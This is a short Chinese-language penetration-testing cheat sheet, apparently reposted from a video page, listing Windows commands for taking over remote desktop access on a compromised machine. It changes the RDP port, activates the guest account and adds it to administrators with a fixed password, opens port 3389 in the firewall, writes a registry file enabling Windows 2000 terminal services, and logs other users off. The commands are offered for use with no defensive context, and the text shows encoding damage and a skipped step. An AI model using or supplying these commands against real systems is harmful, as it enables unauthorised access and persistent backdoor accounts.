滲透測(cè)試 - 終端常用命令_cracer嗶哩嗶哩
1.查詢終端端口
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2.開啟XP&2003終端服務(wù)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
net user guest /active:yes
net localgroup administrators guest /add
net user guest xiao
4.取消xp&2003系統(tǒng)防火墻對(duì)終端服務(wù)的限制及IP連接的限制
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
5.開啟Win2000的終端 (需重啟)
echo Windows Registry Editor Version 5.00 >2000.reg?
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg?
echo "Enabled"="0" >>2000.reg?
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg?
echo "ShutdownWithoutLogon"="0" >>2000.reg?
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg?
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg?
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg?
echo "TSEnabled"=dword:00000001 >>2000.reg?
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg?
echo "Start"=dword:00000002 >>2000.reg?
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg?
echo "Start"=dword:00000002 >>2000.reg?
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg?
echo "Hotkey"="1" >>2000.reg?
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg?
echo "PortNumber"=dword:00000D3D >>2000.reg?
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg?
echo "PortNumber"=dword:00000D3D >>2000.reg
6.解決終端超出了最大連接數(shù)的命令
mstsc /v:ip:3389 /console
query user 看看多少在線? 然后注銷相對(duì)應(yīng)的id? ? ? ? logoff 6(ID)
sc qc mysql